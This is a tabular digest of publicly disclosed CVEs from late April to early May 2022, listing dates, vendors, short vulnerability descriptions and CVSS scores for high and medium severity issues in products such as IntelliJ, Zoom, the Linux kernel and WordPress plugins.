2022-04-28 | CVE-2022-29819 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via links in Quick Documentation was possible | 7.7 |
2022-04-28 | CVE-2022-29821 | Jetbrains | Code Injection vulnerability in Jetbrains Pycharm In JetBrains Rider before 2022.1 local code execution via links in ReSharper Quick Documentation was possible | 7.7 |
2022-05-01 | CVE-2022-21144 | Libxmljs Project | Improper Input Validation vulnerability in Libxmljs Project Libxmljs This affects all versions of package libxmljs. | 7.5 |
2022-05-01 | CVE-2022-21227 | Ghost | Unspecified vulnerability in Ghost Sqlite3 The package sqlite3 before 5.0.3 are vulnerable to Denial of Service (DoS) which will invoke the toString function of the passed parameter. | 7.5 |
2022-05-01 | CVE-2022-25647 | Google Debian Netapp Oracle | Deserialization of Untrusted Data vulnerability in multiple products The package com.google.code.gson:gson before 2.8.9 are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may lead to DoS attacks. | 7.5 |
2022-05-01 | CVE-2022-25844 | Angularjs Fedoraproject Netapp | The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER_FORMATS.PATTERNS[1].posPre with a very high value. | 7.5 |
2022-05-01 | CVE-2022-25850 | Proxyscotch Project | Server-Side Request Forgery (SSRF) vulnerability in Proxyscotch Project Proxyscotch The package github.com/hoppscotch/proxyscotch before 1.0.0 are vulnerable to Server-side Request Forgery (SSRF) when interceptor mode is set to proxy. | 7.5 |
2022-05-01 | CVE-2022-26068 | Pistache Project | Path Traversal vulnerability in Pistache Project Pistache This affects the package pistacheio/pistache before 0.0.3.20220425. | 7.5 |
2022-04-30 | CVE-2022-28323 | Mediawiki | Unspecified vulnerability in Mediawiki An issue was discovered in MediaWiki through 1.37.2. | 7.5 |
2022-04-30 | CVE-2022-29265 | Apache | XXE vulnerability in Apache Nifi Multiple components in Apache NiFi 0.0.1 to 1.16.0 do not restrict XML External Entity references in the default configuration. | 7.5 |
2022-04-29 | CVE-2022-29967 | Glewlwyd Project | Path Traversal vulnerability in Glewlwyd Project Glewlwyd static_compressed_inmemory_website_callback.c in Glewlwyd through 2.6.2 allows directory traversal. | 7.5 |
2022-04-29 | CVE-2022-29945 | DJI | Cleartext Transmission of Sensitive Information vulnerability in DJI products DJI drone devices sold in 2017 through 2022 broadcast unencrypted information about the drone operator's physical location via the AeroScope protocol. | 7.5 |
2022-04-29 | CVE-2022-29935 | USU | Unspecified vulnerability in USU Oracle Optimization 20210817 USU Oracle Optimization before 5.17.5 allows attackers to discover the quantum credentials via an agent-installer download. | 7.5 |
2022-04-29 | CVE-2021-39082 | IBM | Use of a Broken or Risky Cryptographic Algorithm vulnerability in IBM Urbancode Deploy IBM UrbanCode Deploy (UCD) 7.1.1.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. | 7.5 |
2022-04-29 | CVE-2022-29856 | Automationanywhere | Use of Hard-coded Credentials vulnerability in Automationanywhere Automation 360 22 A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages. | 7.5 |
2022-04-29 | CVE-2021-41942 | Msvod | SQL Injection vulnerability in Msvod CMS 10 The Magic CMS MSVOD v10 video system has a SQL injection vulnerability. | 7.5 |
2022-04-28 | CVE-2022-28060 | Victor CMS Project | SQL Injection vulnerability in Victor CMS Project Victor CMS 1.0 SQL Injection vulnerability in Victor CMS v1.0, via the user_name parameter to /includes/login.php. | 7.5 |
2022-04-28 | CVE-2022-29585 | Mahara | Incorrect Default Permissions vulnerability in Mahara In Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0, a site using Isolated Institutions is vulnerable if more than ten groups are used. | 7.5 |
2022-04-28 | CVE-2022-22781 | Zoom | Improper Validation of Integrity Check Value vulnerability in Zoom Meetings The Zoom Client for Meetings for MacOS (Standard and for IT Admin) prior to version 5.9.6 failed to properly check the package version during the update process. | 7.5 |
2022-04-28 | CVE-2022-22783 | Zoom | Unspecified vulnerability in Zoom products A vulnerability in Zoom On-Premise Meeting Connector Controller version 4.8.102.20220310 and On-Premise Meeting Connector MMR version 4.8.102.20220310 exposes process memory fragments to connected clients, which could be observed by a passive attacker. | 7.5 |
2022-04-28 | CVE-2022-24879 | Shopware | Cross-Site Request Forgery (CSRF) vulnerability in Shopware Shopware is an open source e-commerce software platform. | 7.5 |
2022-04-28 | CVE-2022-24892 | Shopware | Weak Password Recovery Mechanism for Forgotten Password vulnerability in Shopware Shopware is an open source e-commerce software platform. | 7.5 |
2022-04-28 | CVE-2022-24935 | Lexmark | Missing Authentication for Critical Function vulnerability in Lexmark Firmware Lexmark products through 2022-02-10 have Incorrect Access Control. | 7.5 |
2022-04-27 | CVE-2021-3523 | Redhat | Improper Preservation of Permissions vulnerability in Redhat Apicast 2.0.0 A flaw was found in 3Scale APICast in versions prior to 2.11.0, where it incorrectly identified connections for reuse. | 7.5 |
2022-04-27 | CVE-2022-22275 | Sonicwall | Unspecified vulnerability in Sonicwall Sonicos Improper Restriction of TCP Communication Channel in HTTP/S inbound traffic from WAN to DMZ bypassing security policy until TCP handshake potentially resulting in Denial of Service (DoS) attack if a target host is vulnerable. | 7.5 |
2022-04-27 | CVE-2022-22278 | Sonicwall | Allocation of Resources Without Limits or Throttling vulnerability in Sonicwall products A vulnerability in SonicOS CFS (Content filtering service) returns a large 403 forbidden HTTP response message to the source address when users try to access prohibited resource this allows an attacker to cause HTTP Denial of Service (DoS) attack | 7.5 |
2022-04-27 | CVE-2021-34589 | Bender | Unspecified vulnerability in Bender products In Bender/ebee Charge Controllers in multiple versions are prone to an RFID leak. | 7.5 |
2022-04-27 | CVE-2021-38878 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar 7.3, 7.4, and 7.5 could allow a malicious actor to impersonate an actor due to key exchange without entity authentication. | 7.5 |
2022-04-27 | CVE-2021-38919 | IBM | Unspecified vulnerability in IBM Qradar Security Information and Event Manager IBM QRadar SIEM 7.3, 7.4, and 7.5 in some senarios may reveal authorized service tokens to other QRadar users. | 7.5 |
2022-04-27 | CVE-2021-46420 | Franklinfueling | Path Traversal vulnerability in Franklinfueling Ts-550 EVO Firmware 2.23.4.8936 Franklin Fueling Systems FFS TS-550 evo 2.23.4.8936 is affected by an unauthenticated directory traversal vulnerability, which allows an attacker to obtain sensitive information. | 7.5 |
2022-04-27 | CVE-2021-46421 | Franklinfueling | Path Traversal vulnerability in Franklinfueling Ts-550 EVO Firmware 1.8.7.7299 Franklin Fueling Systems FFS T5 Series 1.8.7.7299 is affected by an unauthenticated directory traversal vulnerability, which allows an attacker to obtain sensitive information. | 7.5 |
2022-04-27 | CVE-2022-29700 | Zammad | Weak Password Requirements vulnerability in Zammad 5.1.0 A lack of password length restriction in Zammad v5.1.0 allows for the creation of extremely long passwords which can cause a Denial of Service (DoS) during password verification. | 7.5 |
2022-04-27 | CVE-2022-29701 | Zammad | Allocation of Resources Without Limits or Throttling vulnerability in Zammad 5.1.0 A lack of rate limiting in the 'forgot password' feature of Zammad v5.1.0 allows attackers to send an excessive amount of reset requests for a legitimate user, leading to a possible Denial of Service (DoS) via a large amount of generated e-mail messages. | 7.5 |
2022-04-26 | CVE-2022-23942 | Apache | Use of Hard-coded Credentials vulnerability in Apache Doris Apache Doris, prior to 1.0.0, used a hardcoded key and IV to initialize the cipher used for ldap password, which may lead to information disclosure. | 7.5 |
2022-04-26 | CVE-2022-24882 | Freerdp Fedoraproject | FreeRDP is a free implementation of the Remote Desktop Protocol (RDP). | 7.5 |
2022-04-25 | CVE-2021-35250 | Solarwinds | Path Traversal vulnerability in Solarwinds Serv-U 15.3 A researcher reported a Directory Transversal Vulnerability in Serv-U 15.3. | 7.5 |
2022-04-25 | CVE-2022-0656 | Webtoprint | Unspecified vulnerability in Webtoprint web to Print Shop:Udraw The Web To Print Shop : uDraw WordPress plugin before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. | 7.5 |
2022-04-25 | CVE-2022-1392 | Commoninja | Unspecified vulnerability in Commoninja Videos Sync PDF The Videos sync PDF WordPress plugin through 1.7.4 does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues | 7.5 |
2022-04-25 | CVE-2022-24792 | Teluu Debian | PJSIP is a free and open source multimedia communication library written in C. | 7.5 |
2022-04-25 | CVE-2021-45842 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to obtain the first administrator's hash set up in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) on the system as well as other information such as MAC address, internal IP address etc. | 7.5 |
2022-04-25 | CVE-2022-28871 | F Secure | Allocation of Resources Without Limits or Throttling vulnerability in F-Secure Atlant A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the fsicapd component used in certain F-Secure products while scanning larger packages/fuzzed files consume too much memory eventually can crash the scanning engine. | 7.5 |
2022-04-25 | CVE-2022-29546 | Htmlunit | Unspecified vulnerability in Htmlunit HtmlUnit NekoHtml Parser before 2.61.0 suffers from a denial of service vulnerability. | 7.5 |
2022-04-28 | CVE-2021-33436 | Nomachine | Unspecified vulnerability in Nomachine NoMachine for Windows prior to version 6.15.1 and 7.5.2 suffer from local privilege escalation due to the lack of safe DLL loading. | 7.3 |
2022-04-27 | CVE-2022-27905 | Controlup | Unquoted Search Path or Element vulnerability in Controlup In ControlUp Real-Time Agent before 8.6, an unquoted path can result in privilege escalation. | 7.2 |
2022-04-29 | CVE-2022-1402 | Deltaww | Unspecified vulnerability in Deltaww Asda Soft 5.4.1.0 ASDA-Soft: Version 5.4.1.0 and prior does not properly sanitize input while processing a specific project file, allowing a possible out-of-bounds read condition. | 7.1 |
2022-04-29 | CVE-2022-1114 | Imagemagick | Use After Free vulnerability in Imagemagick A heap-use-after-free flaw was found in ImageMagick's RelinquishDCMInfo() function of dcm.c file. | 7.1 |
2022-04-29 | CVE-2022-1353 | Linux Debian Redhat Netapp | A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. | 7.1 |
2022-04-29 | CVE-2022-1534 | Libmobi Project | Out-of-bounds Read vulnerability in Libmobi Project Libmobi Buffer Over-read at parse_rawml.c:1416 in GitHub repository bfabiszewski/libmobi prior to 0.11. | 7.1 |
2022-04-28 | CVE-2022-22782 | Zoom | Unspecified vulnerability in Zoom products The Zoom Client for Meetings for Windows prior to version 5.9.7, Zoom Rooms for Conference Room for Windows prior to version 5.10.0, Zoom Plugins for Microsoft Outlook for Windows prior to version 5.10.3, and Zoom VDI Windows Meeting Clients prior to version 5.9.6; was susceptible to a local privilege escalation issue during the installer repair operation. | 7.1 |
2022-04-28 | CVE-2022-29818 | Jetbrains | Origin Validation Error vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 origin checks in the internal web server were flawed | 7.1 |
2022-04-29 | CVE-2022-1048 | Linux Redhat Debian Netapp | Use After Free vulnerability in multiple products A use-after-free flaw was found in the Linux kernel’s sound subsystem in the way a user triggers concurrent calls of PCM hw_params. | 7.0 |
129 Medium Vulnerabilities
DATE | CVE | VENDOR | VULNERABILITY | CVSS |
---|---|---|---|---|
2022-04-29 | CVE-2022-28198 | Nvidia | Unspecified vulnerability in Nvidia Omniverse Cache and Omniverse Nucleus NVIDIA Omniverse Nucleus and Cache contain a vulnerability in its configuration of OpenSSL, where an attacker with physical access to the system can cause arbitrary code execution which can impact confidentiality, integrity, and availability. | 6.8 |
2022-04-27 | CVE-2022-23822 | Xilinx | Incorrect Authorization vulnerability in Xilinx Zynq-7000 Firmware and Zynq-7000S Firmware In this physical attack, an attacker may potentially exploit the Zynq-7000 SoC First Stage Boot Loader (FSBL) by bypassing authentication and loading a malicious image onto the device. | 6.8 |
2022-04-28 | CVE-2022-29813 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via custom Pandoc path was possible | 6.7 |
2022-04-28 | CVE-2022-29815 | Jetbrains | Code Injection vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 local code execution via workspace settings was possible | 6.7 |
2022-04-29 | CVE-2022-1015 | Linux Fedoraproject | Out-of-bounds Write vulnerability in multiple products A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. | 6.6 |
2022-04-28 | CVE-2022-22441 | IBM | Unspecified vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 could allow an authenticated user to view information of higher privileged users and groups due to a privilege escalation vulnerability. | 6.5 |
2022-04-28 | CVE-2022-1511 | Snipeitapp | Unspecified vulnerability in Snipeitapp Snipe-It Missing Authorization in GitHub repository snipe/snipe-it prior to 5.4.4. | 6.5 |
2022-04-27 | CVE-2022-22312 | IBM | Out-of-bounds Write vulnerability in IBM Security Verify Password Synchronization IBM Security Identity Manager (IBM Security Verify Password Synchronization Plug-in for Windows AD 10.x) is vulnerable to a denial of service, caused by a heap-based buffer overflow in the Password Synch Plug-in. | 6.5 |
2022-04-27 | CVE-2022-22323 | IBM | Out-of-bounds Write vulnerability in IBM Security Verify Password Synchronization IBM Security Identity Manager (IBM Security Verify Password Synchronization Plug-in for Windows AD 10.x) is vulnerable to a denial of service, caused by a heap-based buffer overflow in the Password Synch Plug-in. | 6.5 |
2022-04-26 | CVE-2022-1466 | Redhat | Incorrect Authorization vulnerability in Redhat Keycloak Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions that they should not be allowed to perform. | 6.5 |
2022-04-25 | CVE-2022-27374 | Tenda | Cross-Site Request Forgery (CSRF) vulnerability in Tenda Ax12 Firmware 22.03.01.21Cn Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_42E328 at /goform/SysToolReboot. | 6.5 |
2022-04-25 | CVE-2022-27375 | Tenda | Cross-Site Request Forgery (CSRF) vulnerability in Tenda Ax12 Firmware 22.03.01.21Cn Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_422168 at /goform/WifiExtraSet. | 6.5 |
2022-04-25 | CVE-2021-45839 | Terra Master | Unspecified vulnerability in Terra-Master TOS 4.2.152107141517 It is possible to obtain the first administrator's hash set up on the system in Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517) as well as other information such as MAC address, internal IP address etc. | 6.5 |
2022-04-25 | CVE-2022-1461 | Open EMR | Authorization Bypass Through User-Controlled Key vulnerability in Open-Emr Openemr Non Privilege User can Enable or Disable Registered in GitHub repository openemr/openemr prior to 6.1.0.1. | 6.5 |
2022-04-29 | CVE-2022-29947 | Woodpecker CI | Cross-site Scripting vulnerability in Woodpecker-Ci Woodpecker Woodpecker before 0.15.1 allows XSS via build logs because web/src/components/repo/build/BuildLog.vue lacks escaping. | 6.1 |
2022-04-29 | CVE-2022-1530 | Livehelperchat | Cross-site Scripting vulnerability in Livehelperchat Live Helper Chat Cross-site Scripting (XSS) in GitHub repository livehelperchat/livehelperchat prior to 3.99v. | 6.1 |
2022-04-29 | CVE-2022-29907 | Mediawiki | Cross-site Scripting vulnerability in Mediawiki The Nimbus skin for MediaWiki through 1.37.2 (before 6f9c8fb868345701d9544a54d9752515aace39df) allows XSS in Advertise link messages. | 6.1 |
2022-04-28 | CVE-2022-28454 | Limbas | Cross-site Scripting vulnerability in Limbas 4.3.36.1319 Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-28 | CVE-2022-28477 | Wbce | Cross-site Scripting vulnerability in Wbce CMS 1.5.2 WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-28 | CVE-2022-29413 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Cross-Site Request Forgery (CSRF) leading to Stored Cross-Site Scripting (XSS) in Mufeng's Hermit ????? plugin <= 3.1.6 on WordPress via &title parameter. | 6.1 |
2022-04-28 | CVE-2022-22427 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 6.1 |
2022-04-28 | CVE-2022-27860 | Footer Text Project | Unspecified vulnerability in Footer-Text Project Footer-Text Cross-Site Request Forgery (CSRF) leading to Cross-Site Scripting (XSS) in Shea Bunge's Footer Text plugin <= 2.0.3 on WordPress. | 6.1 |
2022-04-28 | CVE-2022-29415 | Ravpage Project | Unspecified vulnerability in Ravpage Project Ravpage 2.16 Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in Mati Skiba @ Rav Messer's Ravpage plugin <= 2.16 at WordPress. | 6.1 |
2022-04-28 | CVE-2021-43932 | Smartptt | Cross-site Scripting vulnerability in Smartptt Scada 1.1 Elcomplus SmartPTT is vulnerable when an attacker injects JavaScript code into a specific parameter that can executed upon accessing the dashboard or the main page. | 6.1 |
2022-04-28 | CVE-2022-24873 | Shopware | Cross-site Scripting vulnerability in Shopware Shopware is an open source e-commerce software platform. | 6.1 |
2022-04-28 | CVE-2022-29152 | Ericom | Cross-site Scripting vulnerability in Ericom Powerterm Webconnect 6.0 The Ericom PowerTerm WebConnect 6.0 login portal can unsafely write an XSS payload from the AppPortal cookie into the page. | 6.1 |
2022-04-28 | CVE-2022-29817 | Jetbrains | Cross-site Scripting vulnerability in Jetbrains Intellij Idea In JetBrains IntelliJ IDEA before 2022.1 reflected XSS via error messages in internal web server was possible | 6.1 |
2022-04-27 | CVE-2022-24891 | Owasp Oracle Netapp | ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library. | 6.1 |
2022-04-27 | CVE-2022-24887 | Nextcloud | Open Redirect vulnerability in Nextcloud Talk Nextcloud Talk is a video and audio conferencing app for Nextcloud, a self-hosted productivity platform. | 6.1 |
2022-04-27 | CVE-2022-1504 | Microweber | Cross-site Scripting vulnerability in Microweber XSS in /demo/module/?module=HERE in GitHub repository microweber/microweber prior to 1.2.15. | 6.1 |
2022-04-26 | CVE-2022-26564 | Digitaldruid | Cross-site Scripting vulnerability in Digitaldruid Hoteldruid 3.0.3 HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. | 6.1 |
2022-04-26 | CVE-2022-28449 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). | 6.1 |
2022-04-26 | CVE-2021-26628 | Maxb | Cross-site Scripting vulnerability in Maxb Maxboard 1.9.6 Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges. | 6.1 |
2022-04-26 | CVE-2021-36895 | Tripetto | Unspecified vulnerability in Tripetto Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload. | 6.1 |
2022-04-25 | CVE-2022-28290 | Welaunch | Cross-site Scripting vulnerability in Welaunch Wordpress Country Selector 1.6.5 Reflective Cross-Site Scripting vulnerability in WordPress Country Selector Plugin Version 1.6.5. | 6.1 |
2022-04-25 | CVE-2021-25111 | English Wordpress Admin Project | Unspecified vulnerability in English Wordpress Admin Project English Wordpress Admin The English WordPress Admin WordPress plugin before 1.5.2 does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue | 6.1 |
2022-04-25 | CVE-2021-46780 | Supsystic | Unspecified vulnerability in Supsystic Easy Google Maps The Easy Google Maps WordPress plugin before 1.9.32 does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2021-46781 | Subsystic | Unspecified vulnerability in Subsystic Coming Soon The Coming Soon by Supsystic WordPress plugin before 1.7.6 does not sanitise and escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2021-46782 | Supsystic | Unspecified vulnerability in Supsystic Price Table The Pricing Table by Supsystic WordPress plugin before 1.9.5 does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting | 6.1 |
2022-04-25 | CVE-2022-0953 | Download Anti Malware Security AND Brute Force Firewall Project | Unspecified vulnerability in Download Anti-Malware Security and Brute-Force Firewall Project Download Anti-Malware Security and Brute-Force Firewall The Anti-Malware Security and Brute-Force Firewall WordPress plugin before 4.20.96 does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters | 6.1 |
2022-04-25 | CVE-2022-26596 | Liferay | Cross-site Scripting vulnerability in Liferay Digital Experience Platform 7.0/7.1/7.2 Cross-site scripting (XSS) vulnerability in Journal module's web content display configuration page in Liferay Portal 7.1.0 through 7.3.3, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19, and 7.2 before fix pack 8, allows remote attackers to inject arbitrary web script or HTML via web content template names. | 6.1 |
2022-04-25 | CVE-2022-26597 | Liferay | Cross-site Scripting vulnerability in Liferay Digital Experience Platform 7.0/7.3 Cross-site scripting (XSS) vulnerability in the Layout module's Open Graph integration in Liferay Portal 7.3.0 through 7.4.0, and Liferay DXP 7.3 before service pack 3 allows remote attackers to inject arbitrary web script or HTML via the site name. | 6.1 |
2022-04-25 | CVE-2022-28094 | Online Sports Complex Booking System Project | Cross-site Scripting vulnerability in Online Sports Complex Booking System Project Online Sports Complex Booking System 1.0 SCBS Online Sports Venue Reservation System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the fid parameter at booking.php. | 6.1 |
2022-04-25 | CVE-2022-27103 | Element Plus | Cross-site Scripting vulnerability in Element-Plus 2.0.5 element-plus 2.0.5 is vulnerable to Cross Site Scripting (XSS) via el-table-column. | 6.1 |
2022-04-25 | CVE-2022-28586 | Hoosk | Cross-site Scripting vulnerability in Hoosk 1.8.0 XSS in edit page of Hoosk 1.8.0 allows attacker to execute javascript code in user browser via edit page with XSS payload bypass filter some special chars. | 6.1 |
2022-04-27 | CVE-2022-28195 | Nvidia | Integer Overflow or Wraparound vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_read_file function, where insufficient validation of untrusted data may allow a highly privileged local attacker to cause a integer overflow, which may lead to code execution, escalation of privileges, limited denial of service, and some impact to confidentiality and integrity. | 5.7 |
2022-04-30 | CVE-2021-41992 | Pingidentity | Improper Authentication vulnerability in Pingidentity Pingid Integration for Windows Login A misconfiguration of RSA in PingID Windows Login prior to 2.7 is vulnerable to pre-computed dictionary attacks, leading to an offline MFA bypass. | 5.6 |
2022-04-27 | CVE-2022-28193 | Nvidia | Out-of-bounds Write vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where insufficient validation of untrusted data may allow a local attacker with elevated privileges to cause a memory buffer overflow, which may lead to code execution, loss of integrity, limited denial of service, and some impact to confidentiality. | 5.6 |
2022-04-27 | CVE-2022-28194 | Nvidia | Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Nvidia Jetson Linux NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where, if TFTP is enabled, a local attacker with elevated privileges can cause a memory buffer overflow, which may lead to code execution, loss of Integrity, limited denial of service, and some impact to confidentiality. | 5.6 |
2022-05-01 | CVE-2022-21230 | Nanohttpd | Unspecified vulnerability in Nanohttpd This affects all versions of package org.nanohttpd:nanohttpd. | 5.5 |
2022-04-29 | CVE-2021-3982 | Gnome | Improper Check for Dropped Privileges vulnerability in Gnome Gnome-Shell Linux distributions using CAP_SYS_NICE for gnome-shell may be exposed to a privilege escalation issue. | 5.5 |
2022-04-29 | CVE-2022-1195 | Linux Debian | Use After Free vulnerability in multiple products A use-after-free vulnerability was found in the Linux kernel in drivers/net/hamradio. | 5.5 |
2022-04-27 | CVE-2022-24736 | Redis Fedoraproject Netapp Oracle | Redis is an in-memory database that persists on disk. | 5.5 |
2022-04-27 | CVE-2022-1507 | Chafa Project Fedoraproject | NULL Pointer Dereference vulnerability in multiple products chafa: NULL Pointer Dereference in function gif_internal_decode_frame at libnsgif.c:599 allows attackers to cause a denial of service (crash) via a crafted input file. | 5.5 |
2022-04-27 | CVE-2022-29810 | Hashicorp | Information Exposure Through Log Files vulnerability in Hashicorp Go-Getter The Hashicorp go-getter library before 1.5.11 does not redact an SSH key from a URL query parameter. | 5.5 |
2022-04-26 | CVE-2022-27888 | Palantir | Information Exposure Through Log Files vulnerability in Palantir Foundry Issues Foundry Issues service versions 2.244.0 to 2.249.0 was found to be logging in a manner that captured sensitive information (session tokens). | 5.5 |
2022-04-26 | CVE-2022-28218 | Ciphermail | Incorrect Default Permissions vulnerability in Ciphermail Webmail Messenger An issue was discovered in CipherMail Webmail Messenger 1.1.1 through 4.1.4. | 5.5 |
2022-04-25 | CVE-2022-27135 | Xpdfreader | Out-of-bounds Write vulnerability in Xpdfreader Xpdf 4.03 xpdf 4.03 has heap buffer overflow in the function readXRefTable located in XRef.cc. | 5.5 |
2022-04-25 | CVE-2022-28506 | Giflib Project Fedoraproject | Out-of-bounds Write vulnerability in multiple products There is a heap-buffer-overflow in GIFLIB 5.2.1 function DumpScreen2RGB() in gif2rgb.c:298:45. | 5.5 |
2022-05-01 | CVE-2022-25349 | Materializecss | Cross-site Scripting vulnerability in Materializecss Materialize All versions of package materialize-css are vulnerable to Cross-site Scripting (XSS) due to improper escape of user input (such as <not-a-tag />) that is being parsed as HTML/JavaScript, and inserted into the Document Object Model (DOM). | 5.4 |
2022-04-29 | CVE-2022-25854 | Tagify Project | Cross-site Scripting vulnerability in Tagify Project Tagify This affects the package @yaireo/tagify before 4.9.8. | 5.4 |
2022-04-29 | CVE-2022-29414 | Wpkube | Unspecified vulnerability in Wpkube Subscribe to Comments Reloaded Multiple (13x) Cross-Site Request Forgery (CSRF) vulnerabilities in WPKube's Subscribe To Comments Reloaded plugin <= 211130 on WordPress allows attackers to clean up Log archive, download system info file, plugin system settings, plugin options settings, generate a new key, reset all options, change notifications settings, management page settings, comment form settings, manage subscriptions > mass update settings, manage subscriptions > add a new subscription, update subscription, delete Subscription. | 5.4 |
2022-04-29 | CVE-2021-41948 | Intelliants | Cross-site Scripting vulnerability in Intelliants Subrion A cross-site scripting (XSS) vulnerability exists in the "contact us" plugin for Subrion CMS <= 4.2.1 version via "List of subjects". | 5.4 |
2022-04-29 | CVE-2022-1536 | Automad | Cross-site Scripting vulnerability in Automad A vulnerability has been found in automad up to 1.10.9 and classified as problematic. | 5.4 |
2022-04-29 | CVE-2022-1526 | Emlog | Cross-site Scripting vulnerability in Emlog A vulnerability, which was classified as problematic, was found in Emlog Pro up to 1.2.2. | 5.4 |
2022-04-28 | CVE-2022-29412 | Hermit Project | Unspecified vulnerability in Hermit Project Hermit 3.1.6 Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Hermit ????? plugin <= 3.1.6 on WordPress allow attackers to delete cache, delete a source, create source. | 5.4 |
2022-04-28 | CVE-2021-38952 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
2022-04-28 | CVE-2022-1514 | Facturascripts | Cross-site Scripting vulnerability in Facturascripts Stored XSS via upload plugin functionality in zip format in GitHub repository neorazorx/facturascripts prior to 2022.06. | 5.4 |
2022-04-28 | CVE-2022-22322 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
2022-04-28 | CVE-2022-22443 | IBM | Cross-site Scripting vulnerability in IBM Infosphere Information Server 11.7 IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. | 5.4 |
2022-04-28 | CVE-2022-29584 | Mahara | Cross-site Scripting vulnerability in Mahara Mahara before 20.10.5, 21.04.4, 21.10.2, and 22.04.0 allows stored XSS when a particular Cascading Style Sheets (CSS) class for embedly is used, and JavaScript code is constructed to perform an action. | 5.4 |
2022-04-28 | CVE-2022-28102 | PHP Mysql Admin Panel Generator Project | Cross-site Scripting vulnerability in PHP Mysql Admin Panel Generator Project PHP Mysql Admin Panel Generator A cross-site scripting (XSS) vulnerability in PHP MySQL Admin Panel Generator v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected at /edit-db.php. | 5.4 |
2022-04-27 | CVE-2021-34590 | Bender | Unspecified vulnerability in Bender Cc612 Firmware and Icc15Xx Firmware In Bender/ebee Charge Controllers in multiple versions are prone to Cross-site Scripting. | 5.4 |
2022-04-27 | CVE-2022-1503 | GET Simple | Cross-site Scripting vulnerability in Get-Simple Getsimple CMS A vulnerability, which was classified as problematic, has been found in GetSimple CMS. | 5.4 |
2022-04-26 | CVE-2022-28450 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS) via the "Text" parameter (forums) when creating a new post, which allows a remote attacker to execute arbitrary JavaScript code at client browser. | 5.4 |
2022-04-26 | CVE-2022-28522 | Zcms Project | Cross-site Scripting vulnerability in Zcms Project Zcms 20170206 ZCMS v20170206 was discovered to contain a stored cross-site scripting (XSS) vulnerability via index.php?m=home&c=message&a=add. | 5.4 |
2022-04-26 | CVE-2022-28448 | Nopcommerce | Cross-site Scripting vulnerability in Nopcommerce 4.50.1 nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). | 5.4 |
